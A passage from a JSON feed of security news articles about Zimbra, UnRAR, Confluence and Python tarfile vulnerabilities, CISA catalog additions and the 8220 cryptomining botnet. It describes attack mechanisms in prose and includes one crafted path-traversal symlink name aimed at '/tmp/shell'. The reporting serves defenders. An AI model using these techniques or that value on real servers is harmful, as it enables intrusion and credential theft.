[Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-07-29T03:19:00", "type": "thn", "title": "Latest Critical Atlassian Confluence Vulnerability Under Active Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-29T03:22:24", "id": "THN:49CD77302B5D845459BA34357D9C011C", "href": "https://thehackernews.com/2022/07/latest-critical-atlassian-confluence.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-16T03:57:00", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjwT-7sjxllHJ33im2ewzJffbf6_amFwUhqE9YNFRn1oAQ_uUG80yrhVww1nwFO03u8FAjo3L5aPpri00LoT5YlIy_nNaHjUA-HdwxkzOkN5gv9pU2AwTSqEFx6X77vbum3g9G807mbjHzdzl0XuPhwLrXr7cJp7nHZLh2neL2jfZ6uBeKjX_S1PG-X/s728-e100/email.jpg>)\n\nA new high-severity vulnerability has been disclosed in the Zimbra email suite that, if successfully exploited, enables an unauthenticated attacker to steal cleartext passwords of users sans any user interaction.\n\n\"With the consequent access to the victims' mailboxes, attackers can potentially escalate their access to targeted organizations and gain access to various internal services and steal highly sensitive information,\" SonarSource [said](<https://blog.sonarsource.com/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/>) in a report shared with The Hacker News.\n\nTracked as [CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924>) (CVSS score: 7.5), the issue has been characterized as a case of \"Memcached poisoning with unauthenticated request,\" leading to a scenario where an adversary can inject malicious commands and siphon sensitive information.\n\nThis is made possible by poisoning the [IMAP](<https://en.wikipedia.org/wiki/Internet_Message_Access_Protocol>) route cache entries in the Memcached server that's used to look up Zimbra users and forward their HTTP requests to appropriate backend services. Memcached is an in-memory key-value storage system for use as a high performance cache or session store for external database and API calls \u2014 in this case the lookup service.\n\nGiven that Memcached parses incoming requests line-by-line, the vulnerability permits an attacker to send a specially crafted lookup request to the server containing [CRLF characters](<https://developer.mozilla.org/en-US/docs/Glossary/CRLF>), causing the server to execute unintended commands.\n\nThe flaw exists because \"newline characters (\\r\\n) are not escaped in untrusted user input,\" the researchers explained. \"This code flaw ultimately allows attackers to steal cleartext credentials from users of targeted Zimbra instances.\"\n\nArmed with this capability, the attacker can subsequently corrupt the cache to overwrite an entry such that it forwards all IMAP traffic to an attacker-controlled server, including the targeted user's credentials in cleartext.\n\nThat said, the attack presupposes the adversary already is in possession of the victims' email addresses so as to be able to poison the cache entries and that they use an IMAP client to retrieve email messages from a mail server.\n\n\"Typically, an organization uses a pattern for email addresses for their members, such as e.g., {firstname}.{lastname}@example.com,\" the researchers said. \"A list of email addresses could be obtained from OSINT sources such as LinkedIn.\"\n\nA threat actor, however, can get around these restrictions by exploiting a technique called [response smuggling](<https://capec.mitre.org/data/definitions/273.html>), which entails \"smuggling\" unauthorized HTTP responses that abuse the CRLF injection flaw to forward IMAP traffic to a rogue server, thereby stealing credentials from users without prior knowledge of their email addresses.\n\n\"The idea is that by continuously injecting more responses than there are work items into the shared response streams of Memcached, we can force random Memcached lookups to use injected responses instead of the correct response,\" the researchers explained. \"This works because Zimbra did not validate the key of the Memcached response when consuming it.\"\n\nFollowing responsible disclosure on March 11, 2022, patches to completely plug the security hole were [shipped](<https://blog.zimbra.com/2022/05/new-zimbra-security-patches-9-0-0-patch-24-1-and-8-8-15-patch-31-1/>) by Zimbra on May 10, 2022, in versions [8.8.15 P31.1](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31.1>) and [9.0.0 P24.1](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24.1>).\n\nThe findings arrive months after cybersecurity firm Volexity disclosed an espionage campaign dubbed [EmailThief](<https://thehackernews.com/2022/02/hackers-exploited-0-day-vulnerability.html>) that weaponized a zero-day vulnerability in the email platform to target European government and media entities in the wild.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-14T15:13:00", "type": "thn", "title": "New Zimbra Email Vulnerability Could Let Attackers Steal Your Login Credentials", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-06-16T03:13:54", "id": "THN:86F6539B2FD5CE0DEC7585157E18CBEF", "href": "https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-05T05:59:49", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg1qlabRCpYo2LYBmDO-ooZ0Z7AjE5tSW7Q1dVrM9HAlJdlkbmeJ4Lp4rW-i7Wocgu7HRskDAcQ_F9N6MJyiZkdMHHeeBHFu5p1rS3SgR63UmIDBsCk6689iMGqrvI6mvRDrZ1ZkrO1LcyTFyI2fYyAgETyq55krF45SM7PwBmMOgipUg8m2FVigkri/s728-e100/Zimbra.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a recently disclosed high-severity vulnerability in the Zimbra email suite to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing [evidence of active exploitation](<https://www.cisa.gov/uscert/ncas/current-activity/2022/08/04/cisa-adds-one-known-exploited-vulnerability-catalog>).\n\nThe issue in question is [CVE-2022-27924](<https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html>) (CVSS score: 7.5), a command injection flaw in the platform that could lead to the execution of arbitrary Memcached commands and theft of sensitive information.\n\n\"Zimbra Collaboration (ZCS) allows an attacker to inject memcached commands into a targeted instance which causes an overwrite of arbitrary cached entries,\" CISA said.\n\nSpecifically, the bug relates to a case of insufficient validation of user input that, if successfully exploited, could enable attackers to steal cleartext credentials from users of targeted Zimbra instances.\n\nThe issue was [disclosed](<https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html>) by SonarSource in June, with [patches](<https://blog.zimbra.com/2022/05/new-zimbra-security-patches-9-0-0-patch-24-1-and-8-8-15-patch-31-1/>) released by Zimbra on May 10, 2022, in versions 8.8.15 P31.1 and 9.0.0 P24.1.\n\nCISA hasn't shared technical details of the attacks that exploit the vulnerability in the wild and has yet to attribute it to a certain threat actor.\n\nIn the light of active exploitation of the flaw, users are recommended to apply the updates to the software to reduce their exposure to potential cyberattacks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-05T05:54:00", "type": "thn", "title": "CISA Adds Zimbra Email Vulnerability to its Exploited Vulnerabilities Catalog", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-08-05T05:54:43", "id": "THN:EAE0157F6308D86DB939FA200A017132", "href": "https://thehackernews.com/2022/08/cisa-adds-zimbra-email-vulnerability-to.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-29T09:57:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjN3zLpss2pKUyanmGpqvd3WNmNtqxxQU175HcLleaX5NVZ--XqPkZ3JE_TfVGP-jm2ix_AbmnMBXlL5HybtnrtcoTSfKLR9RBlku3ezXjS3lXo9eJ39tgt6ypZlGhtD_bulRIUWTN5bWFBRIm3JkoKOAeIoPT4KOFL4eJvKUHfp8hcUiDnXYtrie0-/s728-e100/zimbra.jpg>)\n\nA new security vulnerability has been disclosed in RARlab's UnRAR utility that, if successfully exploited, could permit a remote attacker to execute arbitrary code on a system that relies on the binary.\n\nThe flaw, assigned the identifier CVE-2022-30333, relates to a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.\n\nFollowing responsible disclosure on May 4, 2022, the shortcoming was addressed by RarLab as part of [version 6.12](<https://www.rarlab.com/download.htm>) released on May 6. Other versions of the software, including those for Windows and Android operating systems, are not impacted.\n\n\"An attacker is able to create files outside of the target extraction directory when an application or victim user extracts an untrusted archive,\" SonarSource researcher Simon Scannell [said](<https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/>) in a Tuesday report. \"If they can write to a known location, they are likely to be able to leverage it in a way leading to the execution of arbitrary commands on the system.\"\n\nIt's worth pointing out that any software that utilizes an unpatched version of UnRAR to extract untrusted archives is affected by the flaw.\n\nThis also includes Zimbra collaboration suite, wherein the vulnerability could lead to pre-authenticated remote code execution on a vulnerable instance, giving the attacker complete access to an email server and even abuse it to access or overwrite other internal resources within the organization's network.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjXuk9ne68WQi3sRiGi6fs-jXeKLsg-dnVM8xRMSWOeFCACmmXEwCbw3IGXFdaxRGs6WfFL1rBphfCvNVl7kWXv1w6F7PwCboZNdniHyZhy2wQ11dEMFL16Ks3IRMUIER3jtyRNZh0v082Rx1dOLwbjdXI22q6XB82ixKwBYdMfOOZ8CE9GBq1VhuxB/s728-e100/tweet.jpg>) \n--- \nImage Source: [Simon Scannell](<https://twitter.com/scannell_simon/status/1541800107909185537>) \n \nThe vulnerability, at its heart, relates to a [symbolic link](<https://en.wikipedia.org/wiki/Symbolic_link>) attack in which a RAR archive is crafted such that it contains a symlink that's a mix of both forward slashes and backslashes (e.g., \"..\\\\..\\\\..\\tmp/shell\") so as to bypass current checks and extract it outside of the expected directory.\n\nMore specifically, the weakness has to do with a function that's designed to convert backslashes ('\\') to forward slashes ('/') so that a RAR archive created on Windows can be extracted on a Unix system, effectively altering the aforementioned symlink to \"../../../tmp/shell.\"\n\nBy taking advantage of this behavior, an attacker can write arbitrary files anywhere on the target filesystem, including creating a JSP shell in Zimbra's web directory and execute malicious commands.\n\n\"The only requirement for this attack is that UnRAR is installed on the server, which is expected as it is required for RAR archive virus-scanning and spam-checking,\" Scannell noted.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-29T09:29:00", "type": "thn", "title": "New UnRAR Vulnerability Could Let Attackers Hack Zimbra Webmail Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-06-29T09:29:21", "id": "THN:7657424EABF9BB266876E3BD437269F4", "href": "https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-25T03:59:16", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgdoBO9G0yDmppL5Yi0n5fJErrBKaMuC7dG6RwERnc7-hIOPtwTTc7VYw97fobW9j4IME5hV5wV4dCdPszOUFP0Jt4BStPmj-mS8RhNu-XO2NO1Cm2FJsTQlwQhf3P9JQBfVfYNNzcfuCK60Y1sohM6nJOhYtXOGQ0vgLdwFPeM5UFgATbaR0a9jTDk/s728-e100/hacking.jpg>)\n\nThe **8220 cryptomining group** has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021.\n\n\"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors,\" Tom Hegel of SentinelOne [said](<https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/>) in a Monday report.\n\nThe growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis.\n\nActive since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently [seen](<https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html>) targeting i686 and x86_64 Linux systems by means of weaponizing a newly disclosed remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner payload.\n\n\"Victims are not targeted geographically, but simply identified by their internet accessibility,\" Hegel pointed out.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhfnqecztp8liSu5CHTIy0iN3GlH9Yrwr7SxKmg-FHKmY0a3GX3_VtN8O_OCrS2KNReS8UVZRXQ5dAqp-HlfJZsmzJCqDuEZescFEZU-9Rh7o7KGy5PorZzShA-KvhH0Myr8f3Stj-YBKQIzkc73CS_8ZOIRLPDauJO1zH3i1QyGNEcTaowK7niXd0H/s728-e100/malware.jpg>)\n\nBesides executing the PwnRig cryptocurrency miner, the infection script is also designed to remove cloud security tools and carry out SSH brute-forcing via a list of 450 hard-coded credentials to further propagate laterally across the network.\n\nThe newer versions of the script are also known to employ blocklists to avoid compromising specific hosts, such as honeypot servers that could flag their illicit efforts.\n\nThe PwnRig cryptominer, which is based on the open source Monero miner XMRig, has received updates of its own as well, using a fake FBI subdomain with an IP address pointing to a legitimate Brazilian federal government domain to create a rogue [pool](<https://en.wikipedia.org/wiki/Mining_pool>) request and obscure the real destination of the generated money.\n\nThe ramping up of the operations is also viewed as an [attempt](<https://thehackernews.com/2022/07/cloud-based-cryptocurrency-miners.html>) to offset falling prices of cryptocurrencies, not to mention underscore a heightened \"battle\" to take control of victim systems from competing cryptojacking-focused groups.\n\n\"Over the past few years 8220 Gang has slowly evolved their simple, yet effective, Linux infection scripts to expand a botnet and illicit cryptocurrency miner,\" Hegel concluded. \"The group has made changes over the recent weeks to expand the botnet to nearly 30,000 victims globally.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T11:44:00", "type": "thn", "title": "This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-25T03:41:26", "id": "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "href": "https://thehackernews.com/2022/07/this-cloud-botnet-has-hijacked-30000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-11T04:01:33", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEix9juoco8nnHAqOnfVgYy907l0FhK0OUIkwyT7Z8lLsHMq1_XaxXWWdbEaVmO0GzWBpock9gOJmj4rYgynCBO3GDRX1ysvbUKHDWfySfjwKhL99dFK9ATPWadGxRBeH2hvWjzW6Exp4vE_gGhbBR8jVOZx7jiJj4XAJ-8kYUuEC2mavEgSWGkq-aW-/s728-e100/linux-unrara.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a recently disclosed security flaw in the UnRAR utility to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.\n\nTracked as CVE-2022-30333 (CVSS score: 7.5), the issue concerns a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.\n\nThis means that an adversary could exploit the flaw to drop arbitrary files on a target system that has the utility installed simply by decompressing the file. The vulnerability was [revealed](<https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html>) by SonarSource researcher Simon Scannell in late June.\n\n\"RARLAB UnRAR on Linux and UNIX contains a directory traversal vulnerability, allowing an attacker to write to files during an extract (unpack) operation,\" the agency [said](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in an advisory.\n\nNot much is known about the nature of the attacks, but the disclosure is evidence of a growing trend wherein threat actors are quick to scan for vulnerable systems after flaws are publicly disclosed and take the opportunity to launch malware and ransomware campaigns.\n\nOn top of that, CISA has also added [CVE-2022-34713](<https://thehackernews.com/2022/08/microsoft-issues-patches-for-121-flaws.html>) to the catalog after Microsoft, as part of its Patch Tuesday updates on August 9, revealed that it has seen indications that the vulnerability has been exploited in the wild.\n\nSaid to be a variant of the vulnerability publicly known as [DogWalk](<https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html>), the shortcoming in the Microsoft Windows Support Diagnostic Tool (MSDT) component could be leveraged by a rogue actor to execute arbitrary code on susceptible systems by tricking a victim into opening a decoy file.\n\nFederal agencies in the U.S. are mandated to apply the updates for both flaws by August 30 to reduce their exposure to cyberattacks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-10T06:59:00", "type": "thn", "title": "CISA Issues Warning on Active Exploitation of UnRAR Software for Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333", "CVE-2022-34713"], "modified": "2022-08-11T03:56:12", "id": "THN:A48A11A9708B43B68518F6625F1C0CB8", "href": "https://thehackernews.com/2022/08/cisa-issues-warning-on-active.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-10-10T04:05:08", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj_mSCNjeWlBLcZ9KTwy9P_b-QtDO-uH5LuoYKGw-YZcAfFgRU0st0csu44_gTgZwL4MVA9GlXLRHGoTpHTNFOSftIiRwcJsFz3v9R_soRPdNhkcQoPitDJc8WQa29QHbw65xEBWA0c3bofUYBs0APomKwz9aGt00iyBYUKhzKwGdIMwB3dM-N9Gw0P/s728-e100/zimbra.jpg>)\n\nA severe remote code execution vulnerability in Zimbra's enterprise collaboration software and email platform is being actively exploited, with no patch currently available to remediate the issue.\n\nThe shortcoming, assigned [CVE-2022-41352](<https://nvd.nist.gov/vuln/detail/CVE-2022-41352>), carries a critical-severity rating of CVSS 9.8, providing a pathway for attackers to upload arbitrary files and carry out malicious actions on affected installations.\n\n\"The vulnerability is due to the method ([cpio](<https://en.wikipedia.org/wiki/Cpio>)) in which Zimbra's antivirus engine ([Amavis](<https://en.wikipedia.org/wiki/Amavis>)) scans inbound emails,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2022/10/06/exploitation-of-unpatched-zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite-cve-2022-41352/>) in an analysis published this week.\n\nThe issue is said to have been abused since early September 2022, according to [details](<https://forums.zimbra.org/viewtopic.php?t=71153&p=306532>) shared on Zimbra forums. While a fix is yet to be released, the software services company is urging users to install the \"pax\" utility and restart the Zimbra services.\n\n\"If the [pax package](<https://manpages.ubuntu.com/manpages/xenial/man1/pax.1.html>) is not installed, Amavis will fall-back to using cpio, unfortunately the fall-back is implemented poorly (by Amavis) and will allow an unauthenticated attacker to create and overwrite files on the Zimbra server, including the Zimbra webroot,\" the company [said](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>) last month.\n\nThe vulnerability, which is present in versions 8.8.15 and 9.0 of the software, affects several Linux distributions such as Oracle Linux 8, Red Hat Enterprise Linux 8, Rocky Linux 8, and CentOS 8, with the exception of Ubuntu due to the fact that pax is already installed by default.\n\nA successful exploitation of the flaw requires an attacker to email an archive file (CPIO or TAR) to a susceptible server, which is then inspected by Amavis using the cpio file archiver utility to extract its contents.\n\n\"Since cpio has no mode where it can be securely used on untrusted files, the attacker can write to any path on the filesystem that the Zimbra user can access,\" Rapid7 researcher Ron Bowes said. \"The most likely outcome is for the attacker to plant a shell in the web root to gain remote code execution, although other avenues likely exist.\"\n\nZimbra said it expects the vulnerability to be addressed in the next software patch, which will remove the dependency on cpio and instead make pax a requirement. However, it has not offered a specific timeframe by when the fix will be available.\n\nRapid7 also noted that CVE-2022-41352 is \"effectively identical\" to [CVE-2022-30333](<https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html>), a path traversal flaw in the Unix version of RARlab's unRAR utility which came to light earlier this June, the only difference being that the new flaw leverages CPIO and TAR archive formats instead of RAR.\n\nEven more troublingly, Zimbra is said to be further vulnerable to another [zero-day privilege escalation flaw](<https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis>), which could be chained with the cpio zero-day to achieve remote root compromise of the servers.\n\nThe fact that Zimbra has been a popular target for threat actors is by no means new. In August, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://www.cisa.gov/uscert/ncas/alerts/aa22-228a>) of adversaries exploiting multiple flaws in the software to breach networks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T07:50:00", "type": "thn", "title": "Hackers Exploiting Unpatched RCE Flaw in Zimbra Collaboration Suite", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333", "CVE-2022-41352"], "modified": "2022-10-10T03:51:05", "id": "THN:0F44740E1DC86B52AFAEA1D981FF08AE", "href": "https://thehackernews.com/2022/10/hackers-exploiting-unpatched-rce-flaw.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-09-23T06:04:17", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbA2bIlmOXJ1eRQQJynmQkCNR9sE-Tfg4FDN-C8ZRjxR8tQglrYyHz9zpGG2ey5xk4F8vqcnDPLKOPTI3rvdORqccx_FiPUgQhCC5MCrB9Eq01BWr1jsYDchcRHTVjgJ0HT4gApba41Dt1PabpG8gC_YGsJ7gW0-PPy5yOJjPGbi16s7Vn0KoF8A0C/s728-e100/code.jpg>)\n\nAs many as 350,000 open source projects are believed to be potentially vulnerable to exploitation as a result of a security flaw in a Python module that has remained unpatched for 15 years.\n\nThe open source repositories span a number of industry verticals, such as software development, artificial intelligence/machine learning, web development, media, security, and IT management.\n\nThe shortcoming, tracked as [CVE-2007-4559](<https://nvd.nist.gov/vuln/detail/CVE-2007-4559>) (CVSS score: 6.8), is rooted in the tarfile module, successful exploitation of which could lead to code execution from an arbitrary file write.\n\n\"The vulnerability is a path traversal attack in the extract and extractall functions in the tarfile module that allow an attacker to overwrite arbitrary files by adding the '..' sequence to filenames in a TAR archive,\" Trellix security researcher Kasimir Schulz [said](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/tarfile-exploiting-the-world.html>) in a writeup.\n\nOriginally disclosed in August 2007, the bug has to do with how a specially crafted tar archive can be leveraged to overwrite arbitrary files on a target machine simply upon opening the file.\n\nPut simply, a threat actor can exploit the weakness by uploading a malicious tarfile in a manner that makes it possible to escape the directory that a file is intended to be extracted to and achieve code execution, allowing the adversary to potentially seize control of a target device.\n\n\"Never extract archives from untrusted sources without prior inspection,\" the Python documentation for tarfile [reads](<https://docs.python.org/3/library/tarfile.html>). \"It is possible that files are created outside of path, e.g. members that have absolute filenames starting with '/' or filenames with two dots '..'.\"\n\nThe vulnerability is also reminiscent of a recently disclosed security flaw in RARlab's UnRAR utility ([CVE-2022-30333](<https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html>)) that could lead to remote code execution.\n\nTrellix has further released a custom utility called [Creosote](<https://github.com/advanced-threat-research/Creosote>) to scan for projects vulnerable to CVE-2007-4559, using it to uncover the vulnerability in the Spyder Python IDE as well as Polemarch.\n\n\"Left unchecked, this vulnerability has been unintentionally added to 